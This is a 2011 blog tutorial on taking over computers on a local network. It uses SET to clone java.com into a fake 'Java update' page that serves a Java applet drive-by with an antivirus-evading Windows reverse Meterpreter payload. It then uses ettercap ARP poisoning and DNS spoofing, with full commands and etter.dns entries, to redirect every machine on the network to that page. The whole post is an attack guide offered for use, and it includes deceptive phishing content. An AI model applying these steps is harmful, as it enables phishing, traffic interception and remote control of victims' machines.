Thursday, 1 December 2011

How to get into local machines using SET + ETTERCAP

My old Tutorial (ettercap + set phishing) got deleted because of its phishing contents. But because I think that it describes a really great method how to use SET+ettercap together, I decided to write this Tutorial in a slightly different way again.

I will use ARP-Poisoning in this Tutorial, which is pretty well explained here. This Tutorial was made using Backtrack 5, which you need too or at least another Linux distro with installed SET, Metasploit and ettercap.

Step 1: Setting up the Fake-Page

a. Start SET, it will look like this

[Image: ymn6i.png]

b. Choose Website Attack Attack Vectors by typing 1

[Image: PUuvD.png]

c. Choose Java Applet Attack

[Image: mvO69.png]

d. Here choose Custom Import, so you can use this script to clone the site in which you want to inject the DriveBy,
so that you can edit the content of the cloned page before SET makes evil stuff with it :P. I cloned for example http://www.java.com/en/, and after cloning I edited the index.html with changing the JAVA + YOU, DOWNLOAD TODAY part to sth like IMPORTANT JAVA UPDATE. You dont have to use this option, you can simply use the Site-Cloner from SET, too.

e. After choosing your site, you have to choose the Payload (Program, that lets you do things with the slave that was on your site and accepted the Java-thing, pretty much like a RAT. Here a Tutorial about how to use Meterpreter). I recommend choice 2 (Windows Reverse_TCP Meterpreter) in here, or if you know that your target has a 64 bit operating system, choose 5 (Windows Reverse_TCP Meterpreter x64), because the x64 one is completely FUD.

f. Now you have to choose the encryption of the Payload , so that it wont get detected by the victims AV. Just choose 16 (Backdoored Executable), which is currently the best.

g. Yet SET is setting up a Metasploit-Listener, which will show you if someone clicked on your Java DriveBy. You MUST keep this window open.

[Image: xwOiE.png]

Step 2: Use ettercap to redirect slave/s to your fake-site


a. The first thing you have to do, is opening the etter.dns file, which is located in /usr/share/ettercap. Just delete everything in it, and if you want to redirect every site your slave visits, write the following into it:


Code:
* A yourip

If you only want to redirect one page, write this:

Code:
thesiteyouwanttoredirect A yourip

So at my specific case, the etter.dns file looks like this (Everything gets redirected to my fake page):

Code:
* A 192.168.0.103

b. Running ettercap

After configuring everything, you can now run the following command:

Code:
ettercap -T -q -P dns_spoof -M ARP // //

This poisons the whole local network, what means, that every PC in your local machine gets redirected to your fake-page.
If you want to redirect only one single PC, you have to run this command:

Code:
ettercap -T -q -P dns_spoof -M ARP /ipofyourvictim/ //

And here is what the parameters actually mean:
-T means Text Interface, so you got no annoying GUI
-q means silent mode, ettercap doesnt display everything it does (which were really annoying)
-P means ettercap hast to use the dns_spoof plugin, which is responsible for the redirecting
-M ARP means Man In The Middle Attack, the whole traffic into your network goes first through your PC

0 comments:

Post a Comment